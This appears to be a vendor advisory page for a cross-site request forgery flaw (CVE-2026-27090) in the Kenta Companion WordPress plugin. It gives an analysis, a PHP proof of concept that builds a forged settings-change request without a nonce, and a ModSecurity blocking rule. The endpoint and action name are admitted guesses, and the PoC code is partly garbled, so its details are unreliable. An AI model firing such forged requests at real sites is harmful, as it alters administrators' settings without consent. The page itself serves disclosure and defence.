Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-27090: Kenta Companion <= 1.3.3 – Cross-Site Request Forgery (kenta-companion)

CVE ID CVE-2026-27090
Plugin kenta-companion
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.3.3
Patched Version
Disclosed January 7, 2026

Analysis Overview

{
“analysis”: “Atomic Edge analysis of CVE-2026-27090 (metadata-based):nThis vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Kenta Companion WordPress plugin, affecting versions up to and including 1.3.3. The vulnerability stems from missing or incorrect nonce validation on a function, allowing unauthenticated attackers to trick an administrator into performing unintended actions via a forged request. The CVSS score of 4.3 (Medium) reflects the attack’s reliance on user interaction and its limited impact on integrity.nnAtomic Edge research infers the root cause is a missing nonce check on a privileged WordPress hook. The description confirms missing or incorrect nonce validation on a function. Without a code diff, it is inferred this function is likely an AJAX handler or admin-post action registered by the plugin. The vulnerability exists because the function performs a state-changing operation without verifying the `_wpnonce` parameter, violating WordPress security standards for privileged requests.nnExploitation requires an attacker to craft a malicious link or webpage that submits a forged HTTP request to the vulnerable endpoint. When a logged-in administrator visits this page, the request executes with the administrator’s privileges. Based on WordPress plugin patterns, the likely target is `/wp-admin/admin-ajax.php` with an `action` parameter corresponding to a Kenta Companion function (e.g., `kenta_companion_update_settings`). The payload would be a standard POST request containing parameters for the unauthorized action.nnRemediation requires adding a nonce verification check to the vulnerable function. The fix should call `check_ajax_referer()` for AJAX handlers or `check_admin_referer()` for admin-post actions, using a unique nonce action name. The patched version must also ensure the function performs a proper capability check (e.g., `current_user_can(‘manage_options’)`) to enforce authorization, though the primary flaw is the missing CSRF protection.nnSuccessful exploitation allows an attacker to perform unauthorized actions within the plugin’s scope. The impact is limited to integrity (I:L) with no confidentiality or availability loss. The specific actions depend on the vulnerable function but could include changing plugin settings, modifying content, or triggering other administrative operations. Attackers cannot directly steal data or gain code execution through this CSRF flaw alone.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-27090 – Kenta Companion <= 1.3.3 – Cross-Site Request Forgeryn ‘kenta_companion_update_setting’, // Inferred action hookn ‘setting_name’ => ‘demo_mode’,n ‘setting_value’ => ‘enabled’n // Note: No ‘_wpnonce’ parameter is included, exploiting the missing check.n);nn// Generate the malicious HTML form that auto-submits.necho ”;necho ”;nforeach ($post_data as $key => $value) {n echo ”;n}necho ”;necho ‘

If you are an authenticated admin, the request was sent.

‘;necho ”;nn// Optional: Direct cURL execution for testing (remove in real attack scenarios).n/*n$ch = curl_init($target_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);n$response = curl_exec($ch);ncurl_close($ch);necho “Response: ” . htmlspecialchars($response);n*/n?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-27090 (metadata-based)n# This rule blocks CSRF exploitation attempts targeting the Kenta Companion plugin’s vulnerable AJAX endpoint.n# The rule matches requests to the WordPress AJAX handler with the inferred action parameter.n# The absence of a nonce parameter is the exploit signature, but we match the action to avoid false positives.nSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:202627090,phase:2,deny,status:403,chain,msg:’CVE-2026-27090: Kenta Companion CSRF via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-27090′,tag:’WordPress’,tag:’Plugin:Kenta-Companion’,tag:’Attack:CSRF'”n SecRule ARGS_POST:action “@streq kenta_companion_update_setting” \n “chain”n SecRule &ARGS_POST:_wpnonce “@eq 0” \n “t:none””
}

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School